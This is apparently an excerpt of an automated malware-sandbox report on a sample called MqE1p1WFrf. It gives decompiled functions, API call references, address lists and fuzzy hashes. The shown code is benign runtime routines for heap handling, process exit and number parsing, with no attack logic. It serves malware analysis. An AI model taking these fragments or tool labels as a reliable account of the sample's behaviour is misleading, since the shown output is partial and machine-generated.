                                                                  0x004070bb
                                                                  0x004070bd
                                                                  0x004070c2
                                                                  0x004070cd
                                                                  0x004070ce
                                                                  0x004070db
                                                                  0x004070e3
                                                                  0x00407128
                                                                  0x0040712b
                                                                  0x00000000
                                                                  0x0040712d
                                                                  0x0040712d
                                                                  0x00407130
                                                                  0x00407132
                                                                  0x0040713e
                                                                  0x00407134
                                                                  0x00407134
                                                                  0x00407137
                                                                  0x00407137
                                                                  0x0040713f
                                                                  0x00407142
                                                                  0x00407148
                                                                  0x00407178
                                                                  0x00407178
                                                                  0x00000000
                                                                  0x0040714a
                                                                  0x0040714c
                                                                  0x00407151
                                                                  0x00407152
                                                                  0x00407165
                                                                  0x00407168
                                                                  0x0040716c
                                                                  0x00407171
                                                                  0x00407174
                                                                  0x00407176
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00407176
                                                                  0x00407148
                                                                  0x004070e5
                                                                  0x004070e5
                                                                  0x004070e8
                                                                  0x004070ee
                                                                  0x00407187
                                                                  0x00407187
                                                                  0x0040718a
                                                                  0x0040718c
                                                                  0x00407190
                                                                  0x00407190
                                                                  0x00407194
                                                                  0x00407194
                                                                  0x00407196
                                                                  0x00407197
                                                                  0x00407197
                                                                  0x0040719f
                                                                  0x004070f4
                                                                  0x004070f6
                                                                  0x004070fc
                                                                  0x00407100
                                                                  0x00407107
                                                                  0x0040710a
                                                                  0x0040710e
                                                                  0x00407113
                                                                  0x00407118
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040711a
                                                                  0x00407118
                                                                  0x004070ee
                                                                  0x004071a8
                                                                  0x004071b3

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040719F
                                                                    • Part of subcall function 00405D91: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00406145,00000009,00000000,00000000,00000001,00404A72,00000001,00000074,?,?,00000000,00000001), ref: 00405DCE
                                                                    • Part of subcall function 00405D91: EnterCriticalSection.KERNEL32(?,?,?,00406145,00000009,00000000,00000000,00000001,00404A72,00000001,00000074,?,?,00000000,00000001), ref: 00405DE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                  • String ID:
                                                                  • API String ID: 1616793339-0
                                                                  • Opcode ID: feb528df80166c21ba428113a96742d51af37cb993fdc85816f314bbfdfd4b21
                                                                  • Instruction ID: 5a25b78a99080707cd03324ec3f808f7d047b9cc2171b41be110f4987c6c28aa
                                                                  • Opcode Fuzzy Hash: feb528df80166c21ba428113a96742d51af37cb993fdc85816f314bbfdfd4b21
                                                                  • Instruction Fuzzy Hash: C3219731E48205ABDB109BA9DC42B9E7764EB00764F204637F410FF3C1C77CB9428A9A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040327F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 40327f-40328a 407 403297-403298 406->407 408 40328c-403293 FindCloseChangeNotification 406->408 408->407
                                                                  C-Code - Quality: 100%
                                                                  			E0040327F(intOrPtr _a4) {
				void* _t5;
				int _t6;
				intOrPtr _t7;

				_t7 = _a4;
				_t2 = _t7 + 0x1c; // 0xec458b40
				_t5 =  *_t2;
				if(_t5 != 0xffffffff) {
					_t6 = FindCloseChangeNotification(_t5); // executed
					 *(_t7 + 0x1c) =  *(_t7 + 0x1c) | 0xffffffff;
					return _t6;
				}
				return _t5;
			}






                                                                  0x00403280
                                                                  0x00403284
                                                                  0x00403284
                                                                  0x0040328a
                                                                  0x0040328d
                                                                  0x00403293
                                                                  0x00000000
                                                                  0x00403293
                                                                  0x00403298

                                                                  APIs
                                                                  • FindCloseChangeNotification.KERNEL32(EC458B40,00000000,0040319A,00000000), ref: 0040328D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: ChangeCloseFindNotification
                                                                  • String ID:
                                                                  • API String ID: 2591292051-0
                                                                  • Opcode ID: fd1f5410178a349e8c46142fade88834a1cda9bf6be84eb5e6d6ff289c76c8bb
                                                                  • Instruction ID: 8665618438dcd9581ee79ec69b2f82ce6187d65e854d11188f7e88188de8c52d
                                                                  • Opcode Fuzzy Hash: fd1f5410178a349e8c46142fade88834a1cda9bf6be84eb5e6d6ff289c76c8bb
                                                                  • Instruction Fuzzy Hash: ADC01230804B108BC6308E2CE8084467BE8AA053347204B4AE0F6E32E0C334E8868B80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401C64 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 409 401c64-401c7c RtlFreeHeap
                                                                  C-Code - Quality: 100%
                                                                  			E00401C64(void* _a4, intOrPtr* _a8) {
				char _t6;

				_t6 = RtlFreeHeap( *( *_a8 + 0xa4), 0, _a4); // executed
				return _t6;
			}




                                                                  0x00401c76
                                                                  0x00401c7c

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?,00401CCE,85561024,00401D6E,00000002,00000000,?,00401D6E,?), ref: 00401C76
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 5b584d3dc92c099f264505fd662f77ef4d8a049519167cfade4e5d6b2cff556c
                                                                  • Instruction ID: 07bfbcd8e3ab0aaf18c2e9e02bb6b5cfc0615297c5fa4075111c495dffaffd90
                                                                  • Opcode Fuzzy Hash: 5b584d3dc92c099f264505fd662f77ef4d8a049519167cfade4e5d6b2cff556c
                                                                  • Instruction Fuzzy Hash: 6CC04838204300AFCE018F54CF49F497BE1AF89700F0444A4B288AA170C672A820EB06
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402E73 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 410 402e73-402e81 call 402e8b ExitProcess
                                                                  C-Code - Quality: 58%
                                                                  			E00402E73(intOrPtr _a12) {

				_push(_a12);
				E00402E8B(); // executed
				ExitProcess(0);
			}



                                                                  0x00402e76
                                                                  0x00402e79
                                                                  0x00402e81

                                                                  APIs
                                                                    • Part of subcall function 00402E8B: HeapCreate.KERNEL32(00000000,00100000,01000000,?,?,?,?,?,?,?,?,?,?,?,?,00402E7E), ref: 00402EA1
                                                                    • Part of subcall function 00402E8B: HeapAlloc.KERNEL32(00000000,00000008,000000B0,?,?,?,?,?,?,?,?,?,?,?,?,00402E7E), ref: 00402ECC
                                                                    • Part of subcall function 00402E8B: HeapAlloc.KERNEL32(00000000,00000008,00000040), ref: 00402EF6
                                                                  • ExitProcess.KERNEL32 ref: 00402E81
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Alloc$CreateExitProcess
                                                                  • String ID:
                                                                  • API String ID: 2343354653-0
                                                                  • Opcode ID: fecf896e79daddb6fa2af0681871abce2d6ff4facb135ae4d2ba60abe77ea687
                                                                  • Instruction ID: 9d449599dcbfd7956eaa924f0b6915338440508c68632957c3addcfaf95664d4
                                                                  • Opcode Fuzzy Hash: fecf896e79daddb6fa2af0681871abce2d6ff4facb135ae4d2ba60abe77ea687
                                                                  • Instruction Fuzzy Hash: 0CB0123004434E6BD6003F62DD0FB0B3B18EB01B16F000039FD08540E15DF16864959A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00408616 Relevance: 26.7, Strings: 21, Instructions: 417COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 70%
                                                                  			E00408616(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v58;
				signed int _v62;
				signed int _v66;
				signed int _v68;
				char _v73;
				char _v96;
				signed int _t121;
				intOrPtr _t141;
				intOrPtr _t143;
				signed int _t146;
				intOrPtr* _t148;

				_t148 = _a12;
				_v16 =  &_v96;
				_t121 = 0;
				_t146 = 1;
				_v44 = 0;
				_v28 = _t146;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v36 = 0;
				_v48 = 0;
				_v52 = 0;
				_v32 = 0;
				_v12 = 0;
				_v24 = 0;
				_a12 = _t148;
				L1:
				_t143 =  *_t148;
				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
					_t148 = _t148 + 1;
					goto L1;
				}
				_push(4);
				while(1) {
					L7:
					_t141 =  *_t148;
					_t148 = _t148 + 1;
					if(_t121 > 0xb) {
						break;
					}
					switch( *((intOrPtr*)(_t121 * 4 +  &M00408AB7))) {
						case 0:
							__eflags = _t141 - 0x31;
							if(_t141 < 0x31) {
								L12:
								__eflags = _t141 -  *0x42d2e4; // 0x2e
								if(__eflags != 0) {
									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x42d2e4; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x42d2e4; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x42d2e0 - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x42d0d4; // 0x42d0de
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00403DBB(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x42d2e4; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x42d2e0 - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x42d0d4; // 0x42d0de
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E00403DBB(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
							__eflags =  *0x42d2e0 - __edx;
							_v40 = __edx;
							if( *0x42d2e0 <= __edx) {
								__ecx =  *0x42d0d4; // 0x42d0de
								__eax = __bl & 0x000000ff;
								__eax = __bl & 0x000000ff & __esi;
								__eflags = __eax;
							} else {
								__eax = __bl & 0x000000ff;
								__eax = E00403DBB(__ecx, __esi, __bl & 0x000000ff, __esi);
								_pop(__ecx);
								_pop(__ecx);
								_push(1);
								_pop(__edx);
							}
							__eflags = __eax;
							if(__eax == 0) {
								goto L94;
							} else {
								__eax = __esi;
								goto L82;
							}
						case 6:
							_t51 = __edi - 2; // 0x0
							__ecx = _t51;
							__eflags = __bl - 0x31;
							_a12 = __ecx;
							if(__bl < 0x31) {
								L68:
								__eax = __bl;
								__eax = __bl - 0x2b;
								__eflags = __eax;
								if(__eax == 0) {
									goto L89;
								}
								__eax = __eax - 1;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L88;
								}
								__eax = __eax - 3;
								__eflags = __eax;
								if(__eax != 0) {
									goto L110;
								}
								goto L71;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L80;
							}
							goto L68;
						case 7:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L83:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									L94:
									__edi = _a12;
									goto L111;
								}
								L71:
								_push(8);
								goto L90;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L83;
							}
							goto L80;
						case 8:
							_v36 = __edx;
							while(1) {
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								goto L109;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L109;
							}
							L80:
							_push(9);
							L81:
							_pop(_t121);
							L82:
							_t148 = _t148 - 1;
							goto L7;
						case 9:
							_v36 = 1;
							__esi = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *0x42d2e0 - 1;
								if( *0x42d2e0 <= 1) {
									__ecx =  *0x42d0d4; // 0x42d0de
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00403DBB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__ecx = __bl;
								_t66 = (__esi + __esi * 4) * 2; // -44
								__esi = __ecx + _t66 - 0x30;
								__eflags = __esi - 0x1450;
								if(__esi > 0x1450) {
									__esi = 0x1451;
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							_v32 = __esi;
							while(1) {
								__eflags =  *0x42d2e0 - 1;
								if( *0x42d2e0 <= 1) {
									__ecx =  *0x42d0d4; // 0x42d0de
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E00403DBB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							L109:
							_t148 = _t148 - 1;
							goto L111;
						case 0xa:
							goto L92;
						case 0xb:
							__eflags = _a28;
							if(_a28 == 0) {
								_push(0xa);
								__edi = __edi - 1;
								__eflags = __edi;
								_pop(__eax);
								goto L92;
							}
							__eax = __bl;
							_t55 = __edi - 1; // 0x1
							__ecx = _t55;
							__eax = __bl - 0x2b;
							__eflags = __eax;
							_a12 = __ecx;
							if(__eax == 0) {
								L89:
								_push(7);
								L90:
								_pop(_t121);
								goto L7;
							}
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								L110:
								__edi = __ecx;
								L111:
								__eflags = _v20;
								 *_a8 = _t148;
								if(_v20 == 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									_v24 = 4;
									L138:
									_t144 = _a4;
									_t124 = _t123 | _v44;
									__eflags = _t124;
									_t144[1] = _t150;
									_t144[0] = _t142;
									_t144[2] = _t124;
									 *_t144 = _t147;
									return _v24;
								}
								_push(0x18);
								_pop(_t126);
								__eflags = _v8 - _t126;
								if(_v8 <= _t126) {
									_t127 = _v16;
								} else {
									__eflags = _v73 - 5;
									if(_v73 >= 5) {
										_t75 =  &_v73;
										 *_t75 = _v73 + 1;
										__eflags =  *_t75;
									}
									_v8 = _t126;
									_t127 = _v16 - 1;
									_v12 = _v12 + 1;
								}
								__eflags = _v8;
								if(_v8 <= 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									goto L129;
								} else {
									while(1) {
										_t127 = _t127 - 1;
										__eflags =  *_t127;
										if( *_t127 != 0) {
											break;
										}
										_v8 = _v8 - 1;
										_v12 = _v12 + 1;
									}
									E0040854F(_t148,  &_v96, _v8,  &_v68);
									_t131 = _v32;
									__eflags = _v28;
									if(_v28 < 0) {
										_t131 =  ~_t131;
									}
									_t132 = _t131 + _v12;
									__eflags = _v36;
									if(_v36 == 0) {
										_t132 = _t132 + _a20;
										__eflags = _t132;
									}
									__eflags = _v40;
									if(_v40 == 0) {
										_t132 = _t132 - _a24;
										__eflags = _t132;
									}
									__eflags = _t132 - 0x1450;
									if(_t132 <= 0x1450) {
										__eflags = _t132 - 0xffffebb0;
										if(_t132 >= 0xffffebb0) {
											E00409171( &_v68, _t132, _a16);
											_t147 = _v68;
											_t142 = _v66;
											_t150 = _v62;
											_t123 = _v58;
											goto L129;
										}
										_v52 = 1;
										goto L128;
									} else {
										_v48 = 1;
										L128:
										_t142 = _a12;
										_t150 = _a12;
										_t123 = _a12;
										_t147 = _a12;
										L129:
										__eflags = _v48;
										if(_v48 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												_t147 = 0;
												_t123 = 0;
												_t150 = 0;
												_t142 = 0;
												__eflags = 0;
												_v24 = 1;
											}
										} else {
											_t142 = 0;
											_t123 = 0x7fff;
											_t150 = 0x80000000;
											_t147 = 0;
											_v24 = 2;
										}
										goto L138;
									}
								}
							}
							L88:
							_v28 = _v28 | 0xffffffff;
							_push(7);
							_pop(__eax);
							goto L7;
					}
				}
				L92:
				if(_t121 == 0xa) {
					goto L111;
				}
				goto L7;
			}


























                                                                  0x0040861f
                                                                  0x00408627
                                                                  0x0040862a
                                                                  0x0040862c
                                                                  0x0040862d
                                                                  0x00408630
                                                                  0x00408633
                                                                  0x00408636
                                                                  0x00408639
                                                                  0x0040863c
                                                                  0x0040863f
                                                                  0x00408642
                                                                  0x00408645
                                                                  0x00408648
                                                                  0x0040864b
                                                                  0x0040864e
                                                                  0x00408651
                                                                  0x00408651
                                                                  0x00408656
                                                                  0x00408667
                                                                  0x00000000
                                                                  0x00408667
                                                                  0x0040866a
                                                                  0x0040866d
                                                                  0x0040866d
                                                                  0x0040866d
                                                                  0x0040866f
                                                                  0x00408673
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408679
                                                                  0x00000000
                                                                  0x00408680
                                                                  0x00408683
                                                                  0x00408691
                                                                  0x00408691
                                                                  0x00408697
                                                                  0x004086a3
                                                                  0x004086a3
                                                                  0x004086a6
                                                                  0x004086c6
                                                                  0x004086ca
                                                                  0x004086cc
                                                                  0x00000000
                                                                  0x004086cc
                                                                  0x004086a9
                                                                  0x004086a9
                                                                  0x004086aa
                                                                  0x004086ba
                                                                  0x004086bc
                                                                  0x004086c3
                                                                  0x00000000
                                                                  0x004086c3
                                                                  0x004086ac
                                                                  0x004086af
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086b5
                                                                  0x00000000
                                                                  0x00408697
                                                                  0x00408685
                                                                  0x00408688
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086cf
                                                                  0x004086d2
                                                                  0x004086d5
                                                                  0x004086dc
                                                                  0x004086dc
                                                                  0x004086e2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086e8
                                                                  0x004086eb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086ed
                                                                  0x004086f0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086f2
                                                                  0x004086f5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086f5
                                                                  0x004086d7
                                                                  0x004086da
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408726
                                                                  0x00408729
                                                                  0x00408734
                                                                  0x00408734
                                                                  0x0040873a
                                                                  0x00408699
                                                                  0x00408699
                                                                  0x00000000
                                                                  0x00408699
                                                                  0x00408740
                                                                  0x00408743
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408749
                                                                  0x00408749
                                                                  0x00000000
                                                                  0x00408749
                                                                  0x0040872b
                                                                  0x0040872e
                                                                  0x0040868a
                                                                  0x0040868a
                                                                  0x00000000
                                                                  0x0040868a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408750
                                                                  0x00408753
                                                                  0x00408753
                                                                  0x00408759
                                                                  0x0040876c
                                                                  0x00408772
                                                                  0x00408778
                                                                  0x00408778
                                                                  0x0040875b
                                                                  0x0040875b
                                                                  0x00408760
                                                                  0x00408765
                                                                  0x00408766
                                                                  0x00408767
                                                                  0x00408769
                                                                  0x00408769
                                                                  0x0040877a
                                                                  0x0040877c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040877e
                                                                  0x00408782
                                                                  0x00408794
                                                                  0x00408794
                                                                  0x00408794
                                                                  0x00408784
                                                                  0x00408784
                                                                  0x00408787
                                                                  0x0040878a
                                                                  0x0040878d
                                                                  0x00408790
                                                                  0x00408790
                                                                  0x00408797
                                                                  0x00408799
                                                                  0x00408799
                                                                  0x0040879c
                                                                  0x004087a2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004087a4
                                                                  0x004087a4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004087ab
                                                                  0x004087af
                                                                  0x004087b2
                                                                  0x004087b5
                                                                  0x004087c4
                                                                  0x004087c4
                                                                  0x004087c4
                                                                  0x004087ca
                                                                  0x004087dd
                                                                  0x004087e3
                                                                  0x004087e9
                                                                  0x004087e9
                                                                  0x004087cc
                                                                  0x004087cc
                                                                  0x004087d1
                                                                  0x004087d6
                                                                  0x004087d7
                                                                  0x004087d8
                                                                  0x004087da
                                                                  0x004087da
                                                                  0x004087eb
                                                                  0x004087ed
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004087ef
                                                                  0x004087f3
                                                                  0x004087f5
                                                                  0x004087f8
                                                                  0x004087fb
                                                                  0x004087fe
                                                                  0x00408801
                                                                  0x00408801
                                                                  0x00408801
                                                                  0x00408804
                                                                  0x00408804
                                                                  0x00408806
                                                                  0x00408808
                                                                  0x00408808
                                                                  0x0040880b
                                                                  0x0040880b
                                                                  0x0040880e
                                                                  0x0040871e
                                                                  0x0040871e
                                                                  0x0040871f
                                                                  0x00000000
                                                                  0x0040871f
                                                                  0x00408814
                                                                  0x00408817
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004086f7
                                                                  0x004086f7
                                                                  0x004086fa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408700
                                                                  0x00408703
                                                                  0x00408717
                                                                  0x00408717
                                                                  0x00000000
                                                                  0x00408717
                                                                  0x00408705
                                                                  0x00408708
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040870e
                                                                  0x00408711
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004087b7
                                                                  0x004087b7
                                                                  0x004087b7
                                                                  0x004087ba
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004087bc
                                                                  0x004087bf
                                                                  0x004087c1
                                                                  0x004087c1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408822
                                                                  0x00408828
                                                                  0x0040882b
                                                                  0x0040883e
                                                                  0x00408844
                                                                  0x0040884a
                                                                  0x0040884a
                                                                  0x0040882d
                                                                  0x0040882d
                                                                  0x00408832
                                                                  0x00408837
                                                                  0x00408838
                                                                  0x00408839
                                                                  0x0040883b
                                                                  0x0040883b
                                                                  0x0040884c
                                                                  0x0040884e
                                                                  0x00000000
                                                                  0x00408854
                                                                  0x00408854
                                                                  0x00000000
                                                                  0x00408854
                                                                  0x00000000
                                                                  0x00408858
                                                                  0x00408858
                                                                  0x0040885b
                                                                  0x0040885e
                                                                  0x00408861
                                                                  0x00408868
                                                                  0x00408868
                                                                  0x0040886b
                                                                  0x0040886b
